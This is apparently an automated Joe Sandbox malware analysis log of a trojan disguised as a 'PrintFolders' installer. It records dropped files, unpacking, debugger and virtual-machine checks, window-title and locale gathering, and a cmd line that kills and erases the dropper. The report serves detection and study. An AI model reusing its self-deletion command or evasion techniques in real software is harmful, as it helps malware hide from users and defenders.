Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: String function: 10003C50 appears 33 times
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: String function: 0040F9E0 appears 54 times

Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00423D9C NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_004127F0 NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_004551C4 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,

Source: is-188R9.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-188R9.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-188R9.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-NNEQH.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-NNEQH.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-NNEQH.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows

Source: is-6TIMV.tmp.1.dr

Static PE information: No import functions for PE file found

Source: file.exe, 00000000.00000000.241847844.0000000000410000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename" vs file.exe
Source: file.exe, 00000000.00000003.242455241.0000000001FA8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exe, 00000000.00000003.242455241.0000000001FA8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilename6 vs file.exe
Source: file.exe, 00000000.00000003.242311828.0000000002090000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exe, 00000000.00000003.242311828.0000000002090000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilename6 vs file.exe
Source: file.exe	Binary or memory string: OriginalFilename" vs file.exe

Source: Joe Sandbox View

Dropped File: C:\Program Files (x86)\PrintFolders\Russian.dll (copy) A960C9DCD1D5C7B79F4FDD38D6F25299F4F7925555E381EA4AB6217681482F62

Source: ntFolders.exe.1.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_SYSHEAP, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_PRELOAD, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp "C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp" /SL4 $402C2 "C:\Users\user\Desktop\file.exe" 2023066 96256
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Process created: C:\Program Files (x86)\PrintFolders\ntFolders.exe "C:\Program Files (x86)\PrintFolders\ntFolders.exe"
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\LUxJPTIXtIs.exe
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "ntFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\ntFolders.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "ntFolders.exe" /f
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp "C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp" /SL4 $402C2 "C:\Users\user\Desktop\file.exe" 2023066 96256
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Process created: C:\Program Files (x86)\PrintFolders\ntFolders.exe "C:\Program Files (x86)\PrintFolders\ntFolders.exe"
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\LUxJPTIXtIs.exe
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "ntFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\ntFolders.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "ntFolders.exe" /f

Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408F74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6D784E70,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00453A8C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6D784E70,

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "ntFolders.exe")

Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe

File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp

Jump to behavior

Source: classification engine

Classification label: mal96.troj.evad.winEXE@12/23@0/5

Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe

Code function: 2_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,

Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp

Code function: 1_2_00454498 GetModuleHandleA,6D2D5550,GetDiskFreeSpaceA,

Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe

Code function: 2_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,

Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe

Code function: 2_2_00405350 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,FindCloseChangeNotification,

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5220:120:WilError_01

Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp

Code function: 1_2_0040B1E0 FindResourceA,FreeResource,

Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp

File created: C:\Program Files (x86)\PrintFolders

Jump to behavior

Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Command line argument: `a}{
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Command line argument: MFE.
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Command line argument: ZK]Z
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Command line argument: ZK]Z

Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp

Window found: window name: TMainForm

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static file information: File size 2268666 > 1048576

Source:

Binary string: E:\DATA\Codework\PrintFolders\source\Release\Russian.pdb source: is-6TIMV.tmp.1.dr

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe

Unpacked PE file: 2.2.ntFolders.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe

Unpacked PE file: 2.2.ntFolders.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R;.aud104:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406584 push 004065C1h; ret
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404159 push eax; ret
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404229 push 00404435h; ret
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00407E84 push ecx; mov dword ptr [esp], eax
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004042AA push 00404435h; ret
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408B24 push 00408B57h; ret
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404327 push 00404435h; ret
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040438C push 00404435h; ret
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00409B70 push 00409BADh; ret
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_0040A257 push ds; ret
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00478210 push 004782BBh; ret
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_0040A22B push ds; ret
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_004063C8 push ecx; mov dword ptr [esp], eax
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_004303A4 push ecx; mov dword ptr [esp], eax
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_0045A74C push ecx; mov dword ptr [esp], eax
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_004108E8 push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00412B40 push 00412BA3h; ret
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00450FF8 push 0045102Bh; ret
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_0040D240 push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_004055BD push eax; ret
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00443660 push ecx; mov dword ptr [esp], ecx
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_0040568D push 00405899h; ret
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00479768 push ecx; mov dword ptr [esp], ecx
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_0040570E push 00405899h; ret
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_004057F0 push 00405899h; ret
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_0040578B push 00405899h; ret
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_0040F7A0 push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00419E40 push ecx; mov dword ptr [esp], ecx
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_004311AD push esi; ret
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_0040F4BB push ecx; ret

Source: ntFolders.exe.1.dr

Static PE information: section name: .aud104

Source: initial sample

Static PE information: section name: .text entropy: 7.371627829177928

Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\LUxJPTIXtIs.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	File created: C:\Program Files (x86)\PrintFolders\unins000.exe (copy)			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	File created: C:\Users\user\AppData\Local\Temp\is-O82Q5.tmp\_isetup\_shfoldr.dll			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	File created: C:\Program Files (x86)\PrintFolders\is-NNEQH.tmp			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	File created: C:\Program Files (x86)\PrintFolders\is-6TIMV.tmp			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	File created: C:\Program Files (x86)\PrintFolders\Russian.dll (copy)			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	File created: C:\Users\user\AppData\Local\Temp\is-O82Q5.tmp\_isetup\_setup64.tmp			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	File created: C:\Users\user\AppData\Local\Temp\is-O82Q5.tmp\_iscrypt.dll			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	File created: C:\Program Files (x86)\PrintFolders\ntFolders.exe			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00423E24 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00423E24 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_004243F4 IsIconic,SetActiveWindow,SetFocus,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_004243AC IsIconic,SetActiveWindow,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_0041859C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00422A74 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_004177B0 IsIconic,GetCapture,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00477D2C IsIconic,GetWindowLongA,ShowWindow,ShowWindow,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00417EE6 IsIconic,SetWindowPos,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00417EE8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetSystemTime,DecisionNodes

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\unins000.exe (copy)			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\is-6TIMV.tmp			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\is-NNEQH.tmp			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-O82Q5.tmp\_isetup\_shfoldr.dll			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\Russian.dll (copy)			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-O82Q5.tmp\_isetup\_setup64.tmp			Jump to dropped file

Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe

Code function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA,

Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004095D0 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,

Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_0046C770 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00474708 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00451554 FindFirstFileA,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_0048A778 FindFirstFileA,6D2D69D0,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_004729D4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_0045CA54 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00406FEC FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_0045DB60 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_0045DEF4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_00423E2D FindFirstFileExW,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_1000959D FindFirstFileExW,

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\

Source: ntFolders.exe, 00000002.00000002.330236396.000000000175A000.00000004.00000020.00020000.00000000.sdmp, ntFolders.exe, 00000002.00000002.330100213.0000000001724000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ntFolders.exe, 00000002.00000002.330236396.000000000175A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWC

Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe

Code function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe

Code function: 2_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,

Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe

Code function: 2_2_00402F20 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_0044028F mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_0042041F mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_00417BAF mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_100091C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_10006CE1 mov eax, dword ptr fs:[00000030h]

Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_0040F789 SetUnhandledExceptionFilter,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_0040F5F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_0040EBD2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_10006180 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_100035DF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_10003AD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "ntFolders.exe" /f

Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "ntFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\ntFolders.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "ntFolders.exe" /f

Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp

Code function: 1_2_004593E4 GetVersion,GetModuleHandleA,6D2D5550,6D2D5550,6D2D5550,AllocateAndInitializeSid,LocalFree,

Source: ntFolders.exe, 00000002.00000002.330751218.00000000034FF000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: ntFolders.exe, 00000002.00000002.330751218.00000000034FF000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: program manager
Source: ntFolders.exe, 00000002.00000002.330751218.00000000034FF000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: F.program manager

Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: GetLocaleInfoA,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: EnumSystemLocalesW,
